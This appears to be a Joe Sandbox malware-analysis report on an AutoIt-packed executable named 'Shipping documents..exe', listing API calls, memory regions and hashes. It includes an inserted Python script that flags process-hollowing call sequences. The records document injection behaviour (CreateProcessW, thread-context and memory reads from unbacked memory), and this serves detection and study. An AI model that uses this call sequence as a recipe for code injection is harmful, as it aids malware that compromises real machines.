                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3300667738-0
                                                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                                          Control-flow Graph

                                                                                                          • Basic blocks (address range, notable calls):
                                                                                                            • 2155: 40e4c0-40e4e5, call 403350, RegOpenKeyExW
                                                                                                            • 2158: 427190-4271ae, RegQueryValueExW
                                                                                                            • 2159: 40e4eb-40e4f0
                                                                                                            • 2160: 4271b0-4271f5, call 4115d7, call 43652f, RegQueryValueExW
                                                                                                            • 2161: 42721a-42722a, RegCloseKey
                                                                                                            • 2166: 427210-427219, call 436508
                                                                                                            • 2167: 4271f7-42720e, call 402160
                                                                                                          • Edges: 2155->2158, 2155->2159, 2158->2160, 2158->2161, 2160->2166, 2160->2167, 2166->2161, 2167->2166
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                          • API String ID: 1586453840-614718249
                                                                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                          APIs
                                                                                                            • Part of subcall function 03EB4EE8: Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EB5151
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileSleep
                                                                                                          • String ID: 35Q7OMHSHM5OCYIBGHHRG
                                                                                                          • API String ID: 2694422964-628726074
                                                                                                          • Opcode ID: 124f1f2544c8d910d327953a82f04015108fdaa75b657f4dd125d27d13578582
                                                                                                          • Instruction ID: 9aac5f5430756be464ba0006d53e2d5384028ff61fd59422ce4879a6c1e5edfe
                                                                                                          • Opcode Fuzzy Hash: 124f1f2544c8d910d327953a82f04015108fdaa75b657f4dd125d27d13578582
                                                                                                          • Instruction Fuzzy Hash: 1F619230D04248DAEF12DBB4D844BEFBB75AF19304F044599E248BB2C1D7BA5B49CB65
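Added example, not part of the Joe Sandbox report: the record above and the CreateProcessW / Wow64GetThreadContext / ReadProcessMemory record further down this page both come from the region at 03EB2000 whose source is marked "based on PE: false", meaning the code issuing those calls is not backed by the executable image on disk. The Python script below parses records in this page's "APIs" / "Memory Dump Source" line format, flags calls made from non-PE-backed memory, and flags the CreateProcessW, then Wow64GetThreadContext, then ReadProcessMemory ordering that opens a process-hollowing style injection, decoding the context-flags argument 00010007 as CONTEXT_FULL for x86 (CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS). The sample text is constructed from records on this page; the rule names, the Finding structure and the regexes are the script's own assumptions, not Joe Sandbox's.

```python
"""Triage helper for Joe Sandbox per-function API records (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Sequence, Tuple, Union

# Constructed sample: records copied in the line format this report uses.
SAMPLE_REPORT = """\
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\\AutoIt v3\\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 03EB4EE8: Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EB5151
Memory Dump Source
• Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03EB46A3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EB4739
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EB475B
Memory Dump Source
• Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
"""

# One API-call line: optional "Part of subcall function X:" prefix, Api.MODULE(args), ref: addr
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The "Source File" line carries the region base and whether it maps to a PE image.
SOURCE_LINE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# x86 CONTEXT flag bits from winnt.h: CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS = CONTEXT_FULL
CONTEXT_I386 = 0x00010000
CONTEXT_FULL_X86 = CONTEXT_I386 | 0x1 | 0x2 | 0x4  # 0x10007

# Ordered API chain treated as a hollowing prologue (heuristic; this script's own rule).
HOLLOWING_PROLOGUE: Tuple[Union[str, Tuple[str, ...]], ...] = (
    "CreateProcessW", ("Wow64GetThreadContext", "GetThreadContext"), "ReadProcessMemory")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    from_subcall: bool


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None


@dataclass
class Finding:
    kind: str
    offset: Optional[int]
    detail: str


def parse_report(text: str) -> List[FunctionRecord]:
    """Group API-call lines into records, attaching the following Source File line."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":            # each "APIs" header starts a new function record
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                                         "Part of subcall" in line))
            continue
        m = SOURCE_LINE.search(line)
        if m and current.offset is None:     # first Source File line wins; "Associated" lines are ignored
            current.offset = int(m["offset"], 16)
            current.pe_backed = m["pe"] == "true"
    return records


def describe_context_flags(flags: int) -> str:
    """Decode the ContextFlags argument of (Wow64)GetThreadContext for x86 contexts."""
    if flags == CONTEXT_FULL_X86:
        return "CONTEXT_FULL (x86)"
    if flags & CONTEXT_I386:
        return "CONTEXT_i386 | 0x%x" % (flags & 0xFFFF)
    return "0x%x" % flags


def _in_order(names: Sequence[str], pattern: Sequence[Union[str, Tuple[str, ...]]]) -> bool:
    """True if every step of pattern appears in names, in order (gaps allowed)."""
    pos = 0
    for step in pattern:
        wanted = step if isinstance(step, tuple) else (step,)
        while pos < len(names) and names[pos] not in wanted:
            pos += 1
        if pos == len(names):
            return False
        pos += 1
    return True


def _hex_arg(args: Sequence[str], index: int) -> Optional[int]:
    try:
        return int(args[index], 16)          # "?" (elided by the sandbox) yields None
    except (IndexError, ValueError):
        return None


def analyze(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for rec in parse_report(text):
        names = [c.api for c in rec.calls]
        if rec.pe_backed is False:
            findings.append(Finding("unbacked_code", rec.offset,
                                    "calls %s from memory not backed by a PE image" % ", ".join(names)))
        if _in_order(names, HOLLOWING_PROLOGUE):
            ctx = next(c for c in rec.calls if c.api.endswith("GetThreadContext"))
            flags = _hex_arg(ctx.args, 1)
            desc = describe_context_flags(flags) if flags is not None else "flags elided"
            findings.append(Finding("hollowing_prologue", rec.offset,
                                    "CreateProcessW -> %s(%s) -> ReadProcessMemory" % (ctx.api, desc)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_REPORT):
        print("%-18s @ %08X: %s" % (f.kind, f.offset or 0, f.detail))
```

On the records copied here this yields one unbacked_code finding for each 03EB2000 record and one hollowing_prologue finding for the CreateProcessW record. Treat both as triage hints rather than proof: the report elides most arguments as "?", so the CREATE_SUSPENDED flag to CreateProcessW cannot be confirmed from this page, and the 4-byte ReadProcessMemory on its own says only that a pointer-sized value was read from the child.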
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$OpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 1607946009-824357125
                                                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 0-554117064
                                                                                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentTerminate
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 2429186680-554117064
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03EB46A3
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EB4739
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EB475B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                          • _free.LIBCMT ref: 004295A0
                                                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3938964917-2335243149
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: Error:
                                                                                                          • API String ID: 4104443479-232661952
                                                                                                          APIs
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                          • String ID: X$pWH
                                                                                                          • API String ID: 85490731-941433119
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                          • String ID: @EXITCODE
                                                                                                          • API String ID: 2734553683-3436989551
                                                                                                          Strings
                                                                                                          • C:\Users\user\Desktop\Shipping documents..exe, xrefs: 00410107
                                                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcat
                                                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 1765576173-992733843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1794320848-0
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 680241177-0
APIs
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: std::exception::exception$Exception@8Throw_malloc
• String ID:
• API String ID: 2388904642-0
APIs
• __wsplitpath.LIBCMT ref: 004678F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ErrorLast__wsplitpath_malloc
• String ID:
• API String ID: 4163294574-0
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Memory Dump Source
